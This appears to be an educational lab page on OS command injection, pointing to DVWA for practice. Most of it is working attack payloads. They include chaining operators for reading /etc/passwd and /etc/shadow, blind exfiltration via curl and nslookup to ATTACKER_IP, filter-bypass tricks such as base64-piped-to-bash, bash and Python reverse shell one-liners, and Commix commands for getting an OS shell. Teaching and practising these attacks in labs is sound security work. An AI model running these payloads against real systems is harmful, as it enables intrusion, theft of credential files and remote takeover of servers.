๐ŸŽฏ Lab Objectives

  • Understand how command injection vulnerabilities arise
  • Detect injection points in web applications
  • Use command chaining operators to inject commands
  • Exploit blind command injection using time delays and out-of-band
  • Escalate to a reverse shell from command injection

Step 1 โ€” What is Command Injection?

Command injection occurs when an application passes user-controlled input to a system shell without proper sanitisation. The attacker injects OS commands that the server executes with the application's privileges.

# Vulnerable PHP code example:
$ip = $_GET['ip'];
system("ping -c 1 " . $ip);

# Normal usage:
GET /ping?ip=8.8.8.8
โ†’ runs: ping -c 1 8.8.8.8

# Injected:
GET /ping?ip=8.8.8.8; whoami
โ†’ runs: ping -c 1 8.8.8.8; whoami
โ†’ Output includes: www-data

Step 2 โ€” Detecting the Vulnerability

# Common injection points:
# - Ping / traceroute tools
# - DNS lookup tools
# - File conversion tools
# - Any field that takes input and does something on the server

# Test with simple time delay (safe, leaves no output)
; sleep 5
| sleep 5
&& sleep 5
`sleep 5`
$(sleep 5)

# If the page takes 5 extra seconds โ†’ vulnerable!

Step 3 โ€” Basic Payloads

# Command chaining operators:
# ;        โ†’ run second command regardless of first's result
# |        โ†’ pipe first output to second command
# &&      โ†’ run second only if first succeeds
# ||       โ†’ run second only if first fails
# &        โ†’ run in background
# `cmd`    โ†’ command substitution
# $(cmd)   โ†’ command substitution (modern)

# Read sensitive files
; cat /etc/passwd
| cat /etc/passwd
&& cat /etc/passwd
; cat /etc/shadow

# System information
; whoami
; id
; uname -a
; hostname

# Network info
; ifconfig
; ip a
; netstat -tulnp

# List files
; ls -la /
; ls -la /home/

Step 4 โ€” Blind Command Injection

Sometimes the command output isn't shown on the page. Use time-based or out-of-band techniques.

# Time-based โ€” sleep and measure response time
; sleep 10
&& ping -c 10 127.0.0.1

# Out-of-band โ€” DNS exfiltration
# Start a listener: nc -lvnp 53 (or use Burp Collaborator)
; nslookup `whoami`.ATTACKER_IP
; curl http://ATTACKER_IP/`whoami`

# Write output to a web-accessible file
; whoami > /var/www/html/output.txt
# Then visit: http://target.com/output.txt

# Exfiltrate /etc/passwd via curl
; curl -d @/etc/passwd http://ATTACKER_IP/receive

Step 5 โ€” Filter Bypasses

# If spaces are filtered:
{cat,/etc/passwd}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
X=$'cat\x20/etc/passwd'&&$X

# If certain words are filtered:
c'a't /etc/passwd      # quotes break keyword detection
/bin/c?t /etc/passwd   # wildcards
/bin/ca* /etc/passwd
echo 'd2hvYW1p' | base64 -d | bash   # base64 encoded "whoami"

# If slash is filtered:
echo${IFS}"whoami"     # use echo trick
${PATH:0:1}etc${PATH:0:1}passwd   # $PATH usually starts with /

# Case variation (works on Windows)
wHoAmI
CMD /C "whoami"

Step 6 โ€” Getting a Reverse Shell

# Start listener on Kali
nc -lvnp 4444

# Inject reverse shell one-liners:
; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# URL-encode for web delivery:
%3B+bash+-c+'bash+-i+>%26+/dev/tcp/ATTACKER_IP/4444+0>%261'

Step 7 โ€” Commix (Automated)

# Commix automates command injection detection and exploitation
sudo apt install commix -y

# Test a GET parameter
commix --url="http://target.com/ping?ip=8.8.8.8"

# Test POST parameter
commix --url="http://target.com/ping" --data="ip=8.8.8.8"

# With cookie (authenticated)
commix --url="http://target.com/ping?ip=8.8.8.8" --cookie="session=abc123"

# Get a shell directly
commix --url="http://target.com/ping?ip=8.8.8.8" --os-shell

๐Ÿ“‹ Injection Operator Reference

OperatorBehaviourExample
;Run second command always8.8.8.8; whoami
|Pipe output to second command8.8.8.8 | id
&&Run second if first succeeds8.8.8.8 && cat /etc/passwd
||Run second if first failsnotanip || whoami
`cmd`Command substitution`whoami`
$(cmd)Command substitution$(id)
&Background (blind)8.8.8.8 & sleep 5
โœ…
Lab Complete! Command injection gives direct OS access. Always test every input field โ€” even ones that don't seem dangerous. Practice on DVWA (Command Injection module).
Next: XSS Lab โ†’ โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands